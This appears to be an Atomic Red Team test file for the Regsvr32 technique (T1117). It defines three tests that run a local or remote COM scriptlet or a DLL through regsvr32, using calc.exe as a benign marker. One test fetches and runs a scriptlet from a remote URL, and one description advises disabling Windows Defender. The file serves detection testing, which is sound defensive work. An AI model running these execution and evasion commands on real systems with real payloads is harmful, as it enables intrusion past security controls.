---
attack_technique: T1117
display_name: Regsvr32
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
  auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306
  description: |
    Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
  supported_platforms:
  - windows
  input_arguments:
   filename:
    description: Name of the local file, include path.
    type: Path
    default: PathToAtomicsFolder\T1117\src\RegSvr32.sct

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Regsvr32.sct must exist on disk at specified location (#{filename})
      prereq_command: |
        if (Test-Path #{filename}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/src/RegSvr32.sct" -OutFile "#{filename}"

  executor:
   name: command_prompt
   elevation_required: false
   command: |
    regsvr32.exe /s /u /i:#{filename} scrobj.dll

- name: Regsvr32 remote COM scriptlet execution
  auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36
  description: |
    Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
    windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
  supported_platforms:
  - windows
  input_arguments:
   url:
    description: URL to hosted sct file
    type: Url
    default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/src/RegSvr32.sct
  executor:
   name: command_prompt
   elevation_required: false
   command: |
    regsvr32.exe /s /u /i:#{url} scrobj.dll

- name: Regsvr32 local DLL execution
  auto_generated_guid: 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b
  description: |
    Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
  supported_platforms:
  - windows
  input_arguments:
   dll_name:
    description: Name of DLL to Execute, DLL Should export DllRegisterServer
    type: Path
    default: PathToAtomicsFolder\T1117\bin\AllTheThingsx86.dll

  dependency_executor_name: powershell
  dependencies:
    - description: |
        AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
      prereq_command: |
        if (Test-Path #{dll_name}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"

  executor:
   name: command_prompt
   elevation_required: false
   command: |
    IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )
